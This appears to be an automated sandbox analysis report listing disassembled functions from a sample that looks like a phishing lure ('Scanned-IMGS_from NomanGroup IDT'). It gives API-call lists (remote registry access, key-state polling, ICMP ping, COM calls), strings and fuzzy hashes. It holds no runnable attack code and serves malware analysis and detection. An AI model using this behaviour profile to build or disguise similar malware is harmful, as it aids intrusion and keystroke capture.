                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: ColorLongWindow
                                                                                • String ID:
                                                                                • API String ID: 259745315-0
                                                                                • Opcode ID: 40260bc49e56243dacb807797a48338825d6ae85cef3b0e812913c6f680f8fa7
                                                                                • Instruction ID: 313677bbc841f0846f841b112ebdb92e6869dbf3f5c9741a322ced2206e03447
                                                                                • Opcode Fuzzy Hash: 40260bc49e56243dacb807797a48338825d6ae85cef3b0e812913c6f680f8fa7
                                                                                • Instruction Fuzzy Hash: AA41C471100650EFDB205F389CC4BBA3769AB56330F14461AF9A28B2E2E7749C42DB1A
                                                                                Function 00488D45 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 300COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: .G
                                                                                • API String ID: 0-1092520701
                                                                                • Opcode ID: 6a22b7bfbf4cc79b70bb4210672092283457056b4e50c0197f527cb5de30894a
                                                                                • Instruction ID: 8761550963e533d3406f1c6a49f29f601b035731e0f5deb2447cda53788a9e9a
                                                                                • Opcode Fuzzy Hash: 6a22b7bfbf4cc79b70bb4210672092283457056b4e50c0197f527cb5de30894a
                                                                                • Instruction Fuzzy Hash: 3CC1F874904249AFCB11FFA9C841BBE7BB0AF0A314F18449EE514A7393C7399D46CB69
                                                                                Function 004B96E2 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 137windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,0049F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 004B9717
                                                                                • LoadStringW.USER32(00000000,?,0049F7F8,00000001), ref: 004B9720
                                                                                  • Part of subcall function 00459CB3: _wcslen.LIBCMT ref: 00459CBD
                                                                                • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,0049F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 004B9742
                                                                                • LoadStringW.USER32(00000000,?,0049F7F8,00000001), ref: 004B9745
                                                                                • MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 004B9866
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: HandleLoadModuleString$Message_wcslen
                                                                                • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                • API String ID: 747408836-2268648507
                                                                                • Opcode ID: 5471274b0e47305e8c153f33303ee4c7ba7ef02495fe2b6e30a9f520719e1efc
                                                                                • Instruction ID: 55f8786621cc57e306468d5a29a48b4544a96885af65105a486904027fa37e11
                                                                                • Opcode Fuzzy Hash: 5471274b0e47305e8c153f33303ee4c7ba7ef02495fe2b6e30a9f520719e1efc
                                                                                • Instruction Fuzzy Hash: EF416D72800219AACF04FBE1CD82DEE7779AF14745F50042AFA0172093EB396F49CB69
                                                                                Function 004B06DE Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 127registryshareCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00456B57: _wcslen.LIBCMT ref: 00456B6A
                                                                                • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 004B07A2
                                                                                • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 004B07BE
                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 004B07DA
                                                                                • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 004B0804
                                                                                • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 004B082C
                                                                                • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 004B0837
                                                                                • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 004B083C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                                                                • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                • API String ID: 323675364-22481851
                                                                                • Opcode ID: e417d23966b04780f906bdc60340b58890c9feb36cd3328e95667181f886c13f
                                                                                • Instruction ID: a8fdd161058cac388a9711e60e6392d3f2e99b9359cff6e295eadbc8a72d7e13
                                                                                • Opcode Fuzzy Hash: e417d23966b04780f906bdc60340b58890c9feb36cd3328e95667181f886c13f
                                                                                • Instruction Fuzzy Hash: CA412672C1022CEBDF11EFA4DC958EEB778FF04355B04412AE801A7162EB349E08CBA4
                                                                                Function 004D3C30 Relevance: 16.8, APIs: 11, Instructions: 344fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • VariantInit.OLEAUT32(?), ref: 004D3C5C
                                                                                • CoInitialize.OLE32(00000000), ref: 004D3C8A
                                                                                • CoUninitialize.OLE32 ref: 004D3C94
                                                                                • _wcslen.LIBCMT ref: 004D3D2D
                                                                                • GetRunningObjectTable.OLE32(00000000,?), ref: 004D3DB1
                                                                                • SetErrorMode.KERNEL32(00000001,00000029), ref: 004D3ED5
                                                                                • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 004D3F0E
                                                                                • CoGetObject.OLE32(?,00000000,004EFB98,?), ref: 004D3F2D
                                                                                • SetErrorMode.KERNEL32(00000000), ref: 004D3F40
                                                                                • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004D3FC4
                                                                                • VariantClear.OLEAUT32(?), ref: 004D3FD8
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                                                                • String ID:
                                                                                • API String ID: 429561992-0
                                                                                • Opcode ID: 39c795d25db9862a9efc9449309967d9d2eab13fa72f481e1f20342a3918424d
                                                                                • Instruction ID: bd07497fdada4534849287ae670bc6475fd7d47c0ae97ea5b714053e6819b804
                                                                                • Opcode Fuzzy Hash: 39c795d25db9862a9efc9449309967d9d2eab13fa72f481e1f20342a3918424d
                                                                                • Instruction Fuzzy Hash: 1AC14371608205AFC700DF69C89492BB7E9FF89749F00492EF98A9B351D734EE06CB56
                                                                                Function 004C7A96 Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CoInitialize.OLE32(00000000), ref: 004C7AF3
                                                                                • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 004C7B8F
                                                                                • SHGetDesktopFolder.SHELL32(?), ref: 004C7BA3
                                                                                • CoCreateInstance.OLE32(004EFD08,00000000,00000001,00516E6C,?), ref: 004C7BEF
                                                                                • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 004C7C74
                                                                                • CoTaskMemFree.OLE32(?,?), ref: 004C7CCC
                                                                                • SHBrowseForFolderW.SHELL32(?), ref: 004C7D57
                                                                                • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 004C7D7A
                                                                                • CoTaskMemFree.OLE32(00000000), ref: 004C7D81
                                                                                • CoTaskMemFree.OLE32(00000000), ref: 004C7DD6
                                                                                • CoUninitialize.OLE32 ref: 004C7DDC
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                                                • String ID:
                                                                                • API String ID: 2762341140-0
                                                                                • Opcode ID: 2d124723fc58a497aed4d363fbfd2b667f8ccbfa2a978eff5ab899dad5cfd927
                                                                                • Instruction ID: eaeec8bde94d3a0caa09499ba946236f22efeb77b36af6b5144bf9494c1b1b79
                                                                                • Opcode Fuzzy Hash: 2d124723fc58a497aed4d363fbfd2b667f8ccbfa2a978eff5ab899dad5cfd927
                                                                                • Instruction Fuzzy Hash: A9C12C75A04109AFCB14DFA4C884DAEBBF9FF48309B1484A9E8169B362D734ED45CF94
                                                                                Function 004E541D Relevance: 16.7, APIs: 11, Instructions: 191windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 004E5504
                                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004E5515
                                                                                • CharNextW.USER32(00000158), ref: 004E5544
                                                                                • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 004E5585
                                                                                • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 004E559B
                                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004E55AC
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$CharNext
                                                                                • String ID:
                                                                                • API String ID: 1350042424-0
                                                                                • Opcode ID: 9cda25f5faab7815978d343e2b1e29b92fd1d7ecc7f1d038dc7acb6bcb0d4bb0
                                                                                • Instruction ID: eedb62afef531e1b55957ee59cab66b275ffcfb1beb2d92bc5cc77608397932d
                                                                                • Opcode Fuzzy Hash: 9cda25f5faab7815978d343e2b1e29b92fd1d7ecc7f1d038dc7acb6bcb0d4bb0
                                                                                • Instruction Fuzzy Hash: 1D61D170900689ABDF10DF62CC84AFF3B79EF0532AF104156F915AA291C7388A81DB69
                                                                                Function 004AFA88 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 004AFAAF
                                                                                • SafeArrayAllocData.OLEAUT32(?), ref: 004AFB08
                                                                                • VariantInit.OLEAUT32(?), ref: 004AFB1A
                                                                                • SafeArrayAccessData.OLEAUT32(?,?), ref: 004AFB3A
                                                                                • VariantCopy.OLEAUT32(?,?), ref: 004AFB8D
                                                                                • SafeArrayUnaccessData.OLEAUT32(?), ref: 004AFBA1
                                                                                • VariantClear.OLEAUT32(?), ref: 004AFBB6
                                                                                • SafeArrayDestroyData.OLEAUT32(?), ref: 004AFBC3
                                                                                • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 004AFBCC
                                                                                • VariantClear.OLEAUT32(?), ref: 004AFBDE
                                                                                • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 004AFBE9
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                • String ID:
                                                                                • API String ID: 2706829360-0
                                                                                • Opcode ID: a2a3bfcfb6611f3492075089f19e22f1e34598a70d341ad7c3cac9a3205f6c5e
                                                                                • Instruction ID: a35bde9d339b83017a7c0ee667023fa489de400bc23eff38dcfc9e7ab889c911
                                                                                • Opcode Fuzzy Hash: a2a3bfcfb6611f3492075089f19e22f1e34598a70d341ad7c3cac9a3205f6c5e
                                                                                • Instruction Fuzzy Hash: 8F4154359002199FCB00DFA5C894DAEBBB9FF59344F00807AF915AB262D734A946CFA4
                                                                                Function 004B9C79 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetKeyboardState.USER32(?), ref: 004B9CA1
                                                                                • GetAsyncKeyState.USER32(000000A0), ref: 004B9D22
                                                                                • GetKeyState.USER32(000000A0), ref: 004B9D3D
                                                                                • GetAsyncKeyState.USER32(000000A1), ref: 004B9D57
                                                                                • GetKeyState.USER32(000000A1), ref: 004B9D6C
                                                                                • GetAsyncKeyState.USER32(00000011), ref: 004B9D84
                                                                                • GetKeyState.USER32(00000011), ref: 004B9D96
                                                                                • GetAsyncKeyState.USER32(00000012), ref: 004B9DAE
                                                                                • GetKeyState.USER32(00000012), ref: 004B9DC0
                                                                                • GetAsyncKeyState.USER32(0000005B), ref: 004B9DD8
                                                                                • GetKeyState.USER32(0000005B), ref: 004B9DEA
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: State$Async$Keyboard
                                                                                • String ID:
                                                                                • API String ID: 541375521-0
                                                                                • Opcode ID: 308fcb22efd9b703ef441386af101f17c80846def5003a8581d0fd3b50219714
                                                                                • Instruction ID: 19bf33a1b318be4de706d4030e505c854cb057c9707c9f55acd857e3c5b548fb
                                                                                • Opcode Fuzzy Hash: 308fcb22efd9b703ef441386af101f17c80846def5003a8581d0fd3b50219714
                                                                                • Instruction Fuzzy Hash: A841B5345047C969FF31867184443E7BEB46F11344F48805BDBC65A7C2D7A8ADC88BBA
                                                                                Function 004D055B Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207networkfileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • WSAStartup.WSOCK32(00000101,?), ref: 004D05BC
                                                                                • inet_addr.WSOCK32(?), ref: 004D061C
                                                                                • gethostbyname.WSOCK32(?), ref: 004D0628
                                                                                • IcmpCreateFile.IPHLPAPI ref: 004D0636
                                                                                • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 004D06C6
                                                                                • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 004D06E5
                                                                                • IcmpCloseHandle.IPHLPAPI(?), ref: 004D07B9
                                                                                • WSACleanup.WSOCK32 ref: 004D07BF
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                • String ID: Ping
                                                                                • API String ID: 1028309954-2246546115
                                                                                • Opcode ID: b83b6f0d19d86f1b83841aeb07bc806734e5664a8c690cee327c8e951ff0a8ab
                                                                                • Instruction ID: 817659d399ec20b3d3954ca22a5a7a45a4690ae5a26192372278af9a875d7583
                                                                                • Opcode Fuzzy Hash: b83b6f0d19d86f1b83841aeb07bc806734e5664a8c690cee327c8e951ff0a8ab
                                                                                • Instruction Fuzzy Hash: 18918E35604241AFD320DF15D498F1ABBE0AF44318F1485ABE8698F7A2D738ED46CF96
                                                                                Function 004D8CD3 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 193COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: _wcslen$BuffCharLower
                                                                                • String ID: cdecl$none$stdcall$winapi
                                                                                • API String ID: 707087890-567219261
                                                                                • Opcode ID: 7d8f4c91d0ca9f7f219186ba2c4430e8942dae3fa5fd50824d83a258e0f41c1a
                                                                                • Instruction ID: f6f79b1b4e9c41acc041ba5b650dd935fa9fcf4cbc6edd67d54037eb4b889b07
                                                                                • Opcode Fuzzy Hash: 7d8f4c91d0ca9f7f219186ba2c4430e8942dae3fa5fd50824d83a258e0f41c1a
                                                                                • Instruction Fuzzy Hash: 9251A171A001169BCB14DF6CC9609BEB7A6BF65724B20422FE826E73C5DB38DD41CB94
                                                                                Function 004D372C Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 187comCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CoInitialize.OLE32 ref: 004D3774
                                                                                • CoUninitialize.OLE32 ref: 004D377F
                                                                                • CoCreateInstance.OLE32(?,00000000,00000017,004EFB78,?), ref: 004D37D9
                                                                                • IIDFromString.OLE32(?,?), ref: 004D384C
                                                                                • VariantInit.OLEAUT32(?), ref: 004D38E4
                                                                                • VariantClear.OLEAUT32(?), ref: 004D3936
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                                                • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                • API String ID: 636576611-1287834457
                                                                                • Opcode ID: 6afe52b2c6764301adf9ee18adb46a961ef2ab8b60ae9f88706c17b2e3a91674
                                                                                • Instruction ID: 78a0f26b65dc052c867300673cfce3a26d24613021de7af13f9eef2674901e4f
                                                                                • Opcode Fuzzy Hash: 6afe52b2c6764301adf9ee18adb46a961ef2ab8b60ae9f88706c17b2e3a91674
                                                                                • Instruction Fuzzy Hash: B5618970608701AFD310EF55C898B5ABBE4AF48716F00481FF9859B391D778EA49CB9B
                                                                                Function 004C3388 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 149COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 004C33CF
                                                                                  • Part of subcall function 00459CB3: _wcslen.LIBCMT ref: 00459CBD
                                                                                • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 004C33F0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: LoadString$_wcslen
                                                                                • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                                                • API String ID: 4099089115-3080491070
                                                                                • Opcode ID: 5cd004e25bd8d38512fb84f8ad9aadbc6db3d2c2ffb2664ceef75270772ac583
                                                                                • Instruction ID: da5dd52861bebc9033552998af3c753e14a21bc9e5c27d442b8f76249ac9b616
                                                                                • Opcode Fuzzy Hash: 5cd004e25bd8d38512fb84f8ad9aadbc6db3d2c2ffb2664ceef75270772ac583
                                                                                • Instruction Fuzzy Hash: EA51D372800209BADF14EBE1CD42EEEB779AF14346F10446AF90572052EB392F5DDB68
                                                                                Function 004BB5C8 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 142COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: _wcslen$BuffCharUpper
                                                                                • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                                • API String ID: 1256254125-769500911
                                                                                • Opcode ID: 8533c14669e16cdb476b10779a0f6845e06e7ef57138892006e7ccccf4316b78
                                                                                • Instruction ID: 5eed5fbd3715cc51d3c5537d5ddb9e520512a7c44ae2875e6b1b0d2383ddd00c
                                                                                • Opcode Fuzzy Hash: 8533c14669e16cdb476b10779a0f6845e06e7ef57138892006e7ccccf4316b78
                                                                                • Instruction Fuzzy Hash: 8741D432A001269BCB206F7D88905FF77A5EBA0758B24412BE465DB384E779CD82C7E5
                                                                                Function 004C5393 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 103COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SetErrorMode.KERNEL32(00000001), ref: 004C53A0
                                                                                • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 004C5416
                                                                                • GetLastError.KERNEL32 ref: 004C5420
                                                                                • SetErrorMode.KERNEL32(00000000,READY), ref: 004C54A7
                                                                                Strings
